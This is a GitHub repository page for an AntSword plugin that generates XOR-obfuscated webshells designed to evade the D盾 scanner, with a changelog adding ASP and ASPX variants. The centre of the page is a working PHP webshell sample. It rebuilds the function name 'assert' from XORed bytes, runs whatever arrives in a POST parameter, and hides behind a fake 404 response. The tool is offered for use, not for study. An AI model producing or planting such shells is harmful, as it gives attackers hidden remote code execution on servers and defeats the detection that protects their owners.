jax777 / as_webshell_venom

利用随机异或无限免杀D盾蚁剑版

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

as_webshell_venom

as_webshell_venom蚁剑版 (thx @SardineFish & @Medicean)

原项目地址: https://github.com/yzddmr6/webshell-venom

2.0 更新日志

  1. 代码重构

  2. 增加 asp aspx 免杀类型

生成 php Shell 样例

<?php 
header('HTTP/1.1 404');
class COMI { 
    public $c='';
    function __destruct() {
        $_0 = "\xfc" ^ "\x9d";
        $_1 = "\x4" ^ "\x77";
        $_2 = "\xb4" ^ "\xc7";
        $_3 = "\x9b" ^ "\xfe";
        $_4 = "\x93" ^ "\xe1";
        $_5 = "\xe7" ^ "\x93";
        $db =$_0.$_1.$_2.$_3.$_4.$_5;
        return @$db($this->c);
    }
}
$comi = new COMI();
@$comi->c = $_POST['yzddmr6'];
?>

About

利用随机异或无限免杀D盾蚁剑版


Languages

Language:JavaScript 100.0%